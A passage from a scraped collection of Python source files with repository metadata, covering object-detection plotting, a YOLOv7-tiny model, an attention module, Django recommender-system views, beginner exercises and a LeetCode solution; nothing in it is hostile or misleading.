zip(batch_tensor_bhwc.data, axes_images, class_predictions, bbox_predictions, targets):\n cids = class_probs.argmax(-1)\n h, w = target['size']\n for cid, box in zip(cids, boxes):\n if cid != config.NIL_CLASS_ID:\n box[0::2] *= w\n box[1::2] *= h\n draw_box(ax, box, edgecolor='C{}'.format(cid), text='{}'.format(config.class_names[cid.item()]))\n\n if axes_masks is not None or batch_tensor_bhwc.mask is not None:\n for mask, ax in zip(batch_tensor_bhwc.mask, axes_masks):\n ax.imshow(mask.float().squeeze(-1))\n\n for mask, ax in zip(segmentation_masks.detach(), axes_pred):\n ax.imshow(mask[0:3].permute(1,2,0))\n\n target_masks = uniform_shape_masks([t['masks'] for t in targets]).float()\n target_masks_count = [t['masks'].shape[0] for t in targets]\n\n for meta, t_masks, t_count, ax in zip(targets, target_masks, target_masks_count, axes_target_masks):\n if t_masks.numel() != 0:\n legend_handels = []\n if t_count >= 3:\n ax.imshow(t_masks[0:3].permute(1,2,0))\n label = meta['labels'][0].item()\n cid = config.class_labels_to_ids[label]\n c_name = config.class_names[cid]\n legend_handels.append(patches.Patch(color='red', label=\"label: {}, id: {}, {}\".format(label, cid, c_name)))\n\n label = meta['labels'][1].item()\n cid = config.class_labels_to_ids[label]\n c_name = config.class_names[cid]\n legend_handels.append(patches.Patch(color='green', label=\"label: {}, id: {}, {}\".format(label, cid, c_name)))\n\n label = meta['labels'][2].item()\n cid = config.class_labels_to_ids[label]\n c_name = config.class_names[cid]\n legend_handels.append(patches.Patch(color='blue', label=\"label: {}, id: {}, {}\".format(label, cid, c_name)))\n if t_count == 1:\n ax.imshow(t_masks[0:1].permute(1,2,0))\n\n label = meta['labels'][0].item()\n cid = config.class_labels_to_ids[label]\n c_name = config.class_names[cid]\n legend_handels.append(patches.Patch(color='red', label=\"label: {}, id: {}, {}\".format(label, cid, c_name)))\n\n ax.legend(handles=legend_handels, prop={'size': 6})\n\n\n f.suptitle(\"epoch:{}\\nbs: {}, height: {},\\n width: {}, channels: {}\".format(config.epoch, *batch_tensor_bhwc.shape));\n\n return f\n\n\ndef draw_box(ax, box, linewidth=1, edgecolor='b', facecolor='none', text=None, label=None, **kwargs):\n cx,cy,w,h = box.unbind(-1)\n anchor_point = (cx-w/2, cy-h/2)\n rect = patches.Rectangle(anchor_point, w, h, linewidth=linewidth, edgecolor=edgecolor, facecolor=facecolor, label=label, **kwargs)\n ax.add_patch(rect)\n if text is not None:\n ax.text(cx, cy, text, color=edgecolor, bbox=dict(boxstyle=\"square\", fc=(0., 0., 0., 0.6), ec=(1., 1., 1., 0.0)))\n ax.scatter(cx, cy, c=edgecolor, s=linewidth)","repo_name":"protsenkovi/diydetr","sub_path":"utils/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73453418435","text":"# # Para conocer el último dígito:\n# numero = 1235654\n\n# letras = str(numero)\n# print(letras)\n\n# longitud = len(letras)\n# print(longitud)\n\n# ultimo = letras[-1]\n# primero = letras[0]\n# print(ultimo)\n# print(primero)\n\n# print (ultimo == \"4\")\n# print (ultimo == \"8\")\n\n\n# lista = [2,5,8,9,6,1]\n# mayor = max(lista)\n# print(mayor in lista[2:3])\n\n# palabra = \"hola\"\n# lista = list(palabra)\n# print(lista)\n\n# palabra_nueva = str(lista)\n# print(palabra_nueva)\n\ndatos_tanque = {\n'codigoTanque': 'TA001',\n'sensor1':'estado',\n'sensor2':'estado',\n'sensor3':'estado'\n}\n\nprint(datos_tanque['codigoTanque'])\n\n# def num():\n# try:\n# if numero > 5:\n# print(\"numero > 5\")\n# else:\n# print (\"numero < 5\")\n# except:\n# print(\"inserte un numero\")\n\n\n\n\n# temperatura_fahr = input('Enter Fahrenheit Temperature:')\n# try:\n# fahr = float(temperatura_fahr)\n# cel = (fahr - 32.0) * 5.0 / 9.0\n# print(cel)\n# except:\n# print('Please enter a number')","repo_name":"isabelyb/Python_MinTIC_2021","sub_path":"week_2/pruebas.py","file_name":"pruebas.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14958693473","text":"\"\"\"\nGiven a non-empty array of integers nums, every element appears twice except for one. Find that single one.\n\nYou must implement a solution with a linear runtime complexity and use only constant extra space.\n\nExample 1:\n\nInput: nums = [2,2,1]\nOutput: 1\nExample 2:\n\nInput: nums = [4,1,2,1,2]\nOutput: 4\n\nExample 3:\n\nInput: nums = [1]\nOutput: 1\n\n\nConstraints:\n\n1 <= nums.length <= 3 * 104\n-3 * 104 <= nums[i] <= 3 * 104\nEach element in the array appears twice except for one element which appears only once.\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n @staticmethod\n def singleNumber(nums: List[int]) -> int:\n nums.sort()\n print(nums)\n position = 0\n while True:\n if position + 1 < len(nums) and nums[position] == nums[position + 1]:\n position += 2\n else:\n return nums[position]\n\n\nsolution = Solution()\nprint(solution.singleNumber([1, 2, 3, 2, 1]))\n","repo_name":"ImSakunthala/leetcode","sub_path":"Beginner_level/Array/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24573321128","text":"import torch\r\nimport pickle\r\nimport torch.nn as nn\r\n\r\n\r\nclass Attention(nn.Module):\r\n \"\"\" Applies attention mechanism on the `context` using the `query`.\r\n\r\n **Thank you** to IBM for their initial implementation of :class:`Attention`. Here is\r\n their `License\r\n `__.\r\n\r\n Args:\r\n dimensions (int): Dimensionality of the query and context.\r\n attention_type (str, optional): How to compute the attention score:\r\n\r\n * dot: :math:`score(H_j,q) = H_j^T q`\r\n * general: :math:`score(H_j, q) = H_j^T W_a q`\r\n\r\n Example:\r\n\r\n >>> attention = Attention(256)\r\n >>> query = torch.randn(5, 1, 256)\r\n >>> context = torch.randn(5, 5, 256)\r\n >>> output, weights = attention(query, context)\r\n >>> output.size()\r\n torch.Size([5, 1, 256])\r\n >>> weights.size()\r\n torch.Size([5, 1, 5])\r\n \"\"\"\r\n\r\n def __init__(self, dimensions, attention_type='general'):\r\n super(Attention, self).__init__()\r\n\r\n if attention_type not in ['dot', 'general']:\r\n raise ValueError('Invalid attention type selected.')\r\n\r\n self.attention_type = attention_type\r\n if self.attention_type == 'general':\r\n self.linear_in = nn.Linear(dimensions, dimensions, bias=False)\r\n\r\n self.linear_out = nn.Linear(dimensions * 2, dimensions, bias=False)\r\n self.softmax = nn.Softmax(dim=-1)\r\n self.tanh = nn.Tanh()\r\n\r\n def forward(self, query, context):\r\n \"\"\"\r\n Args:\r\n query (:class:`torch.FloatTensor` [batch size, output length, dimensions]): Sequence of\r\n queries to query the context.\r\n context (:class:`torch.FloatTensor` [batch size, query length, dimensions]): Data\r\n overwhich to apply the attention mechanism.\r\n\r\n Returns:\r\n :class:`tuple` with `output` and `weights`:\r\n * **output** (:class:`torch.LongTensor` [batch size, output length, dimensions]):\r\n Tensor containing the attended features.\r\n * **weights** (:class:`torch.FloatTensor` [batch size, output length, query length]):\r\n Tensor containing attention weights.\r\n \"\"\"\r\n batch_size, output_len, dimensions = query.size()\r\n query_len = context.size(1)\r\n\r\n if self.attention_type == \"general\":\r\n query = query.view(batch_size * output_len, dimensions)\r\n query = self.linear_in(query)\r\n query = query.view(batch_size, output_len, dimensions)\r\n\r\n # TODO: Include mask on PADDING_INDEX?\r\n\r\n # (batch_size, output_len, dimensions) * (batch_size, query_len, dimensions) ->\r\n # (batch_size, output_len, query_len)\r\n attention_scores = torch.bmm(query, context.transpose(1, 2).contiguous())\r\n\r\n # Compute weights across every context sequence\r\n attention_scores = attention_scores.view(batch_size * output_len, query_len)\r\n attention_weights = self.softmax(attention_scores)\r\n attention_weights = attention_weights.view(batch_size, output_len, query_len)\r\n\r\n # (batch_size, output_len, query_len) * (batch_size, query_len, dimensions) ->\r\n # (batch_size, output_len, dimensions)\r\n output = torch.mul(attention_weights.transpose(1, 2), context)\r\n\r\n return output, attention_weights\r\n\r\n\r\n# open\r\nwith open('./representation/row_representation.pickle', 'rb') as handle:\r\n row_representation = pickle.load(handle)\r\nwith open('./representation/col_representation.pickle', 'rb') as handle:\r\n col_representation = pickle.load(handle)\r\nwith open('./representation/grid_representation.pickle', 'rb') as handle:\r\n grid_representation = pickle.load(handle)\r\nwith open('./representation/tcq_representation.pickle', 'rb') as handle:\r\n table_context_question_representation = pickle.load(handle)\r\n\r\nattention_calc = Attention(768, attention_type='dot')\r\nattention_calc.to('cuda:0')\r\n\r\nweighted_row_representation = []\r\nweighted_col_representation = []\r\nweighted_grid_representation = []\r\n\r\nfor idx in range(len(row_representation)):\r\n weighted_row_rep, _ = attention_calc(table_context_question_representation[idx].unsqueeze(dim=0),\r\n row_representation[idx].to('cuda:0').unsqueeze(dim=0))\r\n weighted_row_representation.append(weighted_row_rep)\r\n\r\nfor idx in range(len(col_representation)):\r\n weighted_col_rep, _ = attention_calc(table_context_question_representation[idx].unsqueeze(dim=0),\r\n col_representation[idx].unsqueeze(dim=0))\r\n weighted_col_representation.append(weighted_col_rep)\r\n\r\nfor idx in range(len(grid_representation)):\r\n for j in range(len(grid_representation[idx]) - 1):\r\n grid_tensor_in_grid = grid_representation[idx][j][0]\r\n for i in range(len(grid_representation[idx][0]) - 1):\r\n temp = grid_representation[idx][j][i + 1].clone().detach()\r\n grid_tensor_in_grid = torch.cat((temp, grid_tensor_in_grid), dim=-2)\r\n if j == 0:\r\n grid_tensor_pre_attention = grid_tensor_in_grid.unsqueeze(dim=0)\r\n grid_tensor_pre_attention = torch.cat((grid_tensor_in_grid.unsqueeze(dim=0), grid_tensor_pre_attention), dim=0)\r\n grid_tensor_pre_attention = torch.reshape(grid_tensor_pre_attention,\r\n [len(grid_representation[idx]) * len(grid_representation[idx][0]), 768])\r\n\r\n weighted_grid_rep, _ = attention_calc(table_context_question_representation[idx].unsqueeze(dim=0),\r\n grid_tensor_pre_attention.unsqueeze(dim=0))\r\n\r\n weighted_grid_representation.append(weighted_grid_rep)\r\n\r\nwith open('./weighted_representation/weighted_col_representation.pickle', 'wb') as handle:\r\n pickle.dump(weighted_col_representation, handle)\r\n\r\nwith open('./weighted_representation/weighted_row_representation.pickle', 'wb') as handle:\r\n pickle.dump(weighted_row_representation, handle)\r\n\r\nwith open('./weighted_representation/weighted_grid_representation.pickle', 'wb') as handle:\r\n pickle.dump(weighted_grid_representation, handle)\r\n","repo_name":"KevinCL16/FeTaQA-Experiment-Preprocess","sub_path":"attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18188945068","text":"# Create your views here.\nfrom check.serializers import DataSerializer, ResultSerializer, ItemsStateSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nimport json\nfrom datetime import datetime\nimport tzlocal\nfrom sklearn.preprocessing import LabelEncoder\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom TestAPI.settings import BASE_DIR\nfrom collections import defaultdict\nimport os\nimport operator\nfrom django.http import JsonResponse\nfrom django.db import connection\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.linear_model import LogisticRegression\nfrom scipy import sparse\n\n\ndef add_missing_columns( d, columns ):\n missing_cols = set( columns ) - set( d.columns )\n for c in missing_cols:\n d[c] = 0\n\ndef fix_columns( d, columns ):\n\n add_missing_columns( d, columns )\n assert( set( columns ) - set( d.columns ) == set())\n extra_cols = set( d.columns ) - set( columns )\n if extra_cols:\n print (\"extra columns:\", extra_cols)\n\n d = d[ columns ]\n return d\n\ndef f(df):\n keys,values=df.sort_values('categoryId').values.T\n ukeys,index=np.unique(keys,True)\n arrays=np.split(values,index[1:])\n df2=pd.DataFrame({'categoryId':ukeys,'itemdId':[list(a) for a in arrays]})\n return df2\n\nclass DataList(APIView):\n '''\n Class for save actual state of recommended items\n '''\n def post(self,request,format=None):\n json_data = request.body.decode('utf-8')\n data1 = json.loads(json_data)\n unix_timestamp = float(data1['clickDate'])/1000\n local_timezone = tzlocal.get_localzone()\n time_format = datetime.fromtimestamp(unix_timestamp, local_timezone)\n data1['clickDate'] = time_format.isoformat()\n data2 = {\"itemId\": data1['itemId'], \"state\": data1['state']}\n data1.pop('state')\n serializer = DataSerializer(data=data1)\n serializer1 = ItemsStateSerializer(data=data2)\n if serializer.is_valid():\n serializer.save()\n if serializer1.is_valid():\n serializer1.save()\n return JsonResponse({\"data1\": serializer.data, \"data2\": serializer1.data})\n\n def get(self, request, format=None):\n return Response(\"WORK WORK WORK\", status=status.HTTP_200_OK)\n\nclass DataList2(APIView):\n def post(self,request,format=None):\n #start_time = time.time()\n json_data = request.body.decode('utf-8')\n data1 = json.loads(json_data)\n unix_timestamp = float(data1['clickDate'])/1000\n local_timezone = tzlocal.get_localzone()\n time_format = datetime.fromtimestamp(unix_timestamp, local_timezone)\n data1['clickDate'] = time_format.isoformat()\n test = pd.DataFrame.from_dict(data1, orient='index').T\n page = int(test['page'])\n rows = int(test['rows'])\n end = page * rows\n start = end - rows\n\n # categories\n\n lb = LabelEncoder()\n lb.classes_ = np.load(os.path.join(BASE_DIR, 'check/classes.npy'))\n test = test.fillna(0)\n test['weekday'] = time_format.weekday()\n test['month'] = time_format.month\n X_test = test[['itemId', 'countryCode', 'weekday', 'month', 'market']]\n X_test = pd.concat([X_test, pd.get_dummies(X_test['market'],\n prefix=\"market\"),\n pd.get_dummies(X_test['countryCode'], prefix=\"countryCode\")],\n axis=1)\n X_test1 = X_test.drop(['countryCode', 'market'], axis=1)\n X = pickle.load(open(os.path.join(BASE_DIR, 'check/trainDataFrame.pkl'), 'rb'))\n fixed_d = fix_columns(X_test1, X.columns)\n clf = pickle.load(open(os.path.join(BASE_DIR, 'check/model.pkl'), 'rb'))\n categories = clf.predict(fixed_d)\n categories_probability = clf.predict_proba(fixed_d)\n categoryBest = []\n for x in categories_probability:\n categoryBest.append(round(x.max(), 3))\n cats = lb.inverse_transform(categories)\n\n user_to_item_matrix = pickle.load(open(os.path.join(BASE_DIR, 'check/user_item_matrix.pkl'), 'rb'))\n #sparse.load_npz(os.path.join(BASE_DIR, 'check/user_item_matrix.npz'))\n cosine_similarity_matrix = cosine_similarity(user_to_item_matrix, user_to_item_matrix, dense_output=False)\n cosine_similarity_matrix.setdiag(0)\n\n # train - table\n cursor = connection.cursor()\n cursor.execute(\n '''\n select distinct *\n from clicks_recommend\n where userId is not null and itemId is not null;\n '''\n )\n clicks = cursor.fetchall()\n events = pd.DataFrame(list(clicks), columns=['id', 'market', 'countryCode', 'userId',\n 'clickType', 'clickDate', 'itemId', 'page', 'rows'])\n\n users_list = list(events['userId'])\n current_user = list(test['userId'])[0]\n\n cursor.execute(\n '''\n select a.itemId, a.state, max(a.updateTime)\n from items_recommend_state as a\n where a.state = '003'\n group by a.itemId, a.state;\n '''\n )\n states = cursor.fetchall()\n state = pd.DataFrame(list(states), columns=['itemId', 'state', 'time'])\n if current_user in users_list:\n user_recommended = cosine_similarity_matrix[current_user].argmax()\n coo_user_matrix = user_to_item_matrix[user_recommended].tocoo()\n sort_df = pd.DataFrame({'itemId': [x for x in coo_user_matrix.col],\n 'value': [y for y in coo_user_matrix.data]})\n sort_df = sort_df.sort_values(by=['value'], ascending=False).reset_index()\n sort_df = sort_df[['itemId', 'value']]\n sort_df['probability'] = sort_df['value'].apply(lambda x: round(x / sort_df['value'].max(), 3))\n full_df = pd.merge(sort_df, state, how='left', on='itemId')\n full_df = full_df[~pd.isnull(full_df['state'])]\n full_df = full_df.drop_duplicates(['itemId'])\n items = list(full_df['itemId'])\n probab = list(full_df['probability'])\n items_save = items[start:end]\n probab_save = probab[start:end]\n\n flg = 0\n if len(items) - end >= 0:\n flg = 1\n\n items_list = []\n for k, v in zip(items_save, probab_save):\n tmp_dict = {\"itemId\": k, \"percentItem\": v}\n items_list.append(tmp_dict)\n\n finalDict = {\"market\": list(test['market'])[0],\n \"countryCode\": list(test['countryCode'])[0],\n \"userId\": list(test['userId'])[0],\n \"categoryId\": cats[0],\n \"categoryPercentage\": categoryBest[0],\n \"isNext\": flg,\n \"items\": items_list}\n serializer = ResultSerializer(finalDict)\n return JsonResponse(serializer.data)\n else:\n cursor.execute(\n '''\n select b.itemId,\n b.cnt\n from\n (select a.itemId,\n a.countryCode,\n count(a.itemId) as cnt\n from clicks_recommend as a\n group by a.itemId, a.countryCode) as b\n where b.countryCode = %s\n order by b.cnt desc;\n ''', [list(test['countryCode'])[0]]\n )\n top_sold = cursor.fetchall()\n top_items = pd.DataFrame(list(top_sold), columns=['itemId', 'cnt'])\n top_items['probability'] = top_items['cnt'].apply(lambda x: round(x / top_items['cnt'].max(), 3))\n full_df = pd.merge(top_items, state, how='left', on='itemId')\n full_df = full_df[~pd.isnull(full_df['state'])]\n full_df = full_df.drop_duplicates(['itemId'])\n items = list(full_df['itemId'])\n probab = list(full_df['probability'])\n items_save = items[start:end]\n probab_save = probab[start:end]\n\n flg = 0\n if len(items) - end >= 0:\n flg = 1\n\n items_list = []\n for k, v in zip(items_save, probab_save):\n tmp_dict = {\"itemId\": k, \"percentItem\": v}\n items_list.append(tmp_dict)\n\n finalDict = {\"market\": list(test['market'])[0],\n \"countryCode\": list(test['countryCode'])[0],\n \"userId\": list(test['userId'])[0],\n \"categoryId\": cats[0],\n \"categoryPercentage\": categoryBest[0],\n \"isNext\": flg,\n \"items\": items_list}\n serializer = ResultSerializer(finalDict)\n return JsonResponse(serializer.data)\n\n return Response(\"OK\")\n def get(self, request, format=None):\n return Response(\"WORK WORK WORK\", status=status.HTTP_200_OK)\n\n\nclass DataList3(APIView):\n '''\n Class for training of user_item_matrix\n '''\n\n def get(self, request, format=None):\n return Response(\"WORK WORK WORK\", status=status.HTTP_200_OK)\n\n def post(self, request, format=None):\n start = datetime.now()\n cursor = connection.cursor()\n cursor.execute(\n '''\n select distinct id as itemId\n from one_items ;\n '''\n )\n items = cursor.fetchall()\n df_items = pd.DataFrame(list(items), columns=['itemId'])\n cursor.execute(\n '''\n select distinct *\n from clicks_recommend\n where userId is not null and itemId is not null;\n '''\n )\n clicks = cursor.fetchall()\n events = pd.DataFrame(list(clicks), columns=['id', 'market', 'countryCode', 'userId',\n 'clickType', 'clickDate','itemId', 'page', 'rows'])\n n_users = events['userId'].max()\n n_items = df_items['itemId'].max()\n #print(str(n_users) + \" \" + str(n_items))\n user_to_item_matrix = sparse.dok_matrix((n_users + 1, n_items + 2), dtype=np.int8)\n\n action_weights = {'CREDIT': 4, 'HOMEPAGE': 3, 'BUYNOW': 5,\n 'PLACEBID': 2, 'SHOWBIDS': 1}\n\n for row in events.itertuples():\n mapped_user_key = row[4]\n event_type = row.clickType\n if event_type in action_weights.keys():\n user_to_item_matrix[mapped_user_key, row[7]] = action_weights[event_type]\n #sparse.save_npz(os.path.join(BASE_DIR, 'check/user_item_matrix.npz'), user_to_item_matrix)\n pickle.dump(user_to_item_matrix, open(os.path.join(BASE_DIR, 'check/user_item_matrix.pkl'), 'wb'))\n print(\"Process of training finished. It took {}.\".format(datetime.now() - start))\n return Response(\"TRAIN OK\", status=status.HTTP_200_OK)\n\n\nclass DataList4(APIView):\n '''\n Class for training classification\n '''\n\n def get(self, request, format=None):\n return Response(\"WORK WORK WORK\", status=status.HTTP_200_OK)\n\n def post(self, request, format=None):\n # start_time = time.time()\n cursor = connection.cursor()\n cursor.execute(\n \"(select a.userId, a.market, a.clickType, a.clickDate, a.itemId, a.countryCode, b.categoryId from clicks_recommend a join one_items_categories b on a.itemId = b.itemId order by a.id desc limit 50000) union all (select a.userId, a.market, a.clickType, a.clickDate, a.itemId, a.countryCode, b.categoryId from clicks_recommend a join one_items_categories b on a.itemId = b.itemId order by a.id limit 50000);\"\n )\n clicks = cursor.fetchall()\n df = pd.DataFrame(list(clicks),\n columns=['userId', 'market', 'clickType', 'clickDate', 'itemId', 'countryCode', 'categoryId'])\n print(df.head())\n df = df.fillna(0)\n df['time'] = pd.to_datetime(df['clickDate'])\n df['weekday'] = df['time'].apply(lambda x: x.weekday())\n df['month'] = df['time'].apply(lambda x: x.month)\n pickle.dump(df, open('trainFull.pkl', 'wb'), protocol=2)\n df_buy = df[df['clickType'] == 'BUYNOW']\n df_hp = df[(df['clickType'] == 'HOMEPAGE')]\n frames = [df_buy, df_hp]\n result = pd.concat(frames)\n X_M = result[['itemId', 'countryCode', 'weekday', 'month', 'market']]\n lb = LabelEncoder()\n lb.fit(result.categoryId)\n y = lb.transform(result.categoryId)\n np.save('classes.npy', lb.classes_)\n X = pd.concat([X_M, pd.get_dummies(X_M['countryCode'], prefix=\"countryCode\"),\n pd.get_dummies(X_M['market'], prefix=\"market\")], axis=1)\n X = X.drop(['countryCode', 'market'], axis=1)\n pickle.dump(X, open('trainDataFrame.pkl', 'wb'), protocol=2)\n clf = LogisticRegression()\n clf = clf.fit(X, y)\n filename = 'model.pkl'\n pickle.dump(clf, open(filename, 'wb'), protocol=2)\n # print(\"--- %s seconds ---\" % (time.time() - start_time))\n return Response(\"TRAIN OK\", status=status.HTTP_200_OK)\n\n\nclass DataList5(APIView):\n '''\n Class for update status\n '''\n def get(self, request, format=None):\n return Response(\"WORK WORK WORK\", status=status.HTTP_200_OK)\n\n #{\"itemId\": 697153, \"active\": true}\n def post(self, request, format=None):\n # start_time = time.time()\n json_data = request.body.decode('utf-8')\n data1 = json.loads(json_data)\n if data1['active'] is True:\n data2 = {\"itemId\": data1['itemId'], \"state\": \"003\"}\n else:\n data2 = {\"itemId\": data1['itemId'], \"state\": \"005\"}\n serializer1 = ItemsStateSerializer(data=data2)\n if serializer1.is_valid():\n serializer1.save()\n return Response(\"OK\", status=status.HTTP_200_OK)\n\n\n\n","repo_name":"mmiomika/TestAPI","sub_path":"check/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"573488071","text":"import numpy as np\nfrom tensorflow.keras.layers import (Concatenate, Input, Lambda, MaxPooling2D,\n UpSampling2D, ZeroPadding2D)\nfrom tensorflow.keras.models import Model\n\nfrom nets.backbone import (DarknetConv2D, DarknetConv2D_BN_Leaky,\n Multi_Concat_Block, darknet_body)\nfrom nets.yolo_training import yolo_loss\n\n\ndef SPPCSPC(x, c2, n=1, shortcut=False, g=1, e=0.5, k=(13, 9, 5), weight_decay=5e-4, name=\"\"):\n c_ = int(2 * c2 * e) # hidden channels\n x1 = DarknetConv2D_BN_Leaky(c_, (1, 1), weight_decay=weight_decay, name = name + '.cv1')(x)\n \n y1 = Concatenate(axis=-1)([MaxPooling2D(pool_size=(m, m), strides=(1, 1), padding='same')(x1) for m in k] + [x1])\n y1 = DarknetConv2D_BN_Leaky(c_, (1, 1), weight_decay=weight_decay, name = name + '.cv3')(y1)\n \n y2 = DarknetConv2D_BN_Leaky(c_, (1, 1), weight_decay=weight_decay, name = name + '.cv2')(x)\n out = Concatenate(axis=-1)([y1, y2])\n out = DarknetConv2D_BN_Leaky(c2, (1, 1), weight_decay=weight_decay, name = name + '.cv4')(out)\n \n return out\n\n#---------------------------------------------------#\n# Panet网络的构建,并且获得预测结果\n#---------------------------------------------------#\ndef yolo_body(input_shape, anchors_mask, num_classes, weight_decay=5e-4):\n #-----------------------------------------------#\n # 定义了不同yolov7-tiny的参数\n #-----------------------------------------------#\n transition_channels = 16\n block_channels = 16\n panet_channels = 16\n e = 1\n n = 2\n ids = [-1, -2, -3, -4]\n #-----------------------------------------------#\n # 输入图片是640, 640, 3\n #-----------------------------------------------#\n\n inputs = Input(input_shape)\n #---------------------------------------------------# \n # 生成主干模型,获得三个有效特征层,他们的shape分别是:\n # 80, 80, 256\n # 40, 40, 512\n # 20, 20, 1024\n #---------------------------------------------------#\n feat1, feat2, feat3 = darknet_body(inputs, transition_channels, block_channels, n, weight_decay)\n\n # 20, 20, 1024 -> 20, 20, 512\n P5 = SPPCSPC(feat3, transition_channels * 16, weight_decay=weight_decay, name=\"sppcspc\")\n P5_conv = DarknetConv2D_BN_Leaky(transition_channels * 8, (1, 1), weight_decay=weight_decay, name=\"conv_for_P5\")(P5)\n P5_upsample = UpSampling2D()(P5_conv)\n P4 = Concatenate(axis=-1)([DarknetConv2D_BN_Leaky(transition_channels * 8, (1, 1), weight_decay=weight_decay, name=\"conv_for_feat2\")(feat2), P5_upsample])\n P4 = Multi_Concat_Block(P4, panet_channels * 4, transition_channels * 8, e=e, n=n, ids=ids, weight_decay=weight_decay, name=\"conv3_for_upsample1\")\n\n P4_conv = DarknetConv2D_BN_Leaky(transition_channels * 4, (1, 1), weight_decay=weight_decay, name=\"conv_for_P4\")(P4)\n P4_upsample = UpSampling2D()(P4_conv)\n P3 = Concatenate(axis=-1)([DarknetConv2D_BN_Leaky(transition_channels * 4, (1, 1), weight_decay=weight_decay, name=\"conv_for_feat1\")(feat1), P4_upsample])\n P3 = Multi_Concat_Block(P3, panet_channels * 2, transition_channels * 4, e=e, n=n, ids=ids, weight_decay=weight_decay, name=\"conv3_for_upsample2\")\n \n P3_downsample = ZeroPadding2D(((1, 1),(1, 1)))(P3)\n P3_downsample = DarknetConv2D_BN_Leaky(transition_channels * 8, (3, 3), strides = (2, 2), weight_decay=weight_decay, name = 'down_sample1')(P3_downsample)\n P4 = Concatenate(axis=-1)([P3_downsample, P4])\n P4 = Multi_Concat_Block(P4, panet_channels * 4, transition_channels * 8, e=e, n=n, ids=ids, weight_decay=weight_decay, name=\"conv3_for_downsample1\")\n\n P4_downsample = ZeroPadding2D(((1, 1),(1, 1)))(P4)\n P4_downsample = DarknetConv2D_BN_Leaky(transition_channels * 16, (3, 3), strides = (2, 2), weight_decay=weight_decay, name = 'down_sample2')(P4_downsample)\n P5 = Concatenate(axis=-1)([P4_downsample, P5])\n P5 = Multi_Concat_Block(P5, panet_channels * 8, transition_channels * 16, e=e, n=n, ids=ids, weight_decay=weight_decay, name=\"conv3_for_downsample2\")\n \n P3 = DarknetConv2D_BN_Leaky(transition_channels * 8, (3, 3), strides=(1, 1), weight_decay=weight_decay, name=\"rep_conv_1\")(P3)\n P4 = DarknetConv2D_BN_Leaky(transition_channels * 16, (3, 3), strides=(1, 1), weight_decay=weight_decay, name=\"rep_conv_2\")(P4)\n P5 = DarknetConv2D_BN_Leaky(transition_channels * 32, (3, 3), strides=(1, 1), weight_decay=weight_decay, name=\"rep_conv_3\")(P5)\n\n # len(anchors_mask[2]) = 3\n # 5 + num_classes -> 4 + 1 + num_classes\n # 4是先验框的回归系数,1是sigmoid将值固定到0-1,num_classes用于判断先验框是什么类别的物体\n # bs, 20, 20, 3 * (4 + 1 + num_classes)\n out2 = DarknetConv2D(len(anchors_mask[2]) * (5 + num_classes), (1, 1), weight_decay=weight_decay, strides = (1, 1), name = 'yolo_head_P3')(P3)\n out1 = DarknetConv2D(len(anchors_mask[1]) * (5 + num_classes), (1, 1), weight_decay=weight_decay, strides = (1, 1), name = 'yolo_head_P4')(P4)\n out0 = DarknetConv2D(len(anchors_mask[0]) * (5 + num_classes), (1, 1), weight_decay=weight_decay, strides = (1, 1), name = 'yolo_head_P5')(P5)\n return Model(inputs, [out0, out1, out2])\n\ndef get_train_model(model_body, input_shape, num_classes, anchors, anchors_mask, label_smoothing):\n y_true = [Input(shape = (input_shape[0] // {0:32, 1:16, 2:8}[l], input_shape[1] // {0:32, 1:16, 2:8}[l], \\\n len(anchors_mask[l]), 2)) for l in range(len(anchors_mask))] + [Input(shape = [None, 5])]\n model_loss = Lambda(\n yolo_loss, \n output_shape = (1, ), \n name = 'yolo_loss', \n arguments = {\n 'input_shape' : input_shape, \n 'anchors' : anchors, \n 'anchors_mask' : anchors_mask, \n 'num_classes' : num_classes, \n 'label_smoothing' : label_smoothing, \n 'balance' : [0.4, 1.0, 4],\n 'box_ratio' : 0.05,\n 'obj_ratio' : 1 * (input_shape[0] * input_shape[1]) / (640 ** 2), \n 'cls_ratio' : 0.5 * (num_classes / 80)\n }\n )([*model_body.output, *y_true])\n model = Model([model_body.input, *y_true], model_loss)\n return model\n","repo_name":"bubbliiiing/yolov7-tiny-tf2","sub_path":"nets/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"27618874434","text":"import numpy as np\nimport pandas as pd\nimport os\nimport timm\nfrom tqdm import tqdm\nfrom statistics import mode\nimport glob\n\nimport torch\nimport torch.nn as nn\n\n\nfrom series_loader import build_dataloader\nfrom torch.utils.data import Dataset, DataLoader, Subset\nimport nibabel as nib\nimport cv2\n\n\nmodel_name = \"efficientnet_b2\"\nckp_path = \"/home/single1/BACKUP/binhdao/binhdao/weights/EfficientNet_b2_224.pth\"\n\nlabel_dict = {0: \"Non Contrast\", 1: \"Venous\", 2: \"Arterial\", 3: \"Others\"}\n\n# data = glob.glob('/home/single1/BACKUP/binhdao/lits/Training_Batch1/media/nas/01_Datasets/CT/LITS/Training_Batch_1/volume*')\ndata = glob.glob(\n \"/home/single1/BACKUP/binhdao/lits/Training_Batch2/media/nas/01_Datasets/CT/LITS/Training_Batch_2/volume*\"\n)\n\n\nwindow_width = 400\nwindow_center = 50\n\ndef apply_window(img, ww: float, wc: float):\n \"\"\"\n Apply HU window on a HU image\n\n Args:\n img: Image to transform\n ww: Window width\n wc: Window center\n \"\"\"\n lower_bound = wc - ww / 2\n upper_bound = wc + ww / 2\n\n img[img < lower_bound] = lower_bound\n img[img > upper_bound] = upper_bound\n\n img = (img - 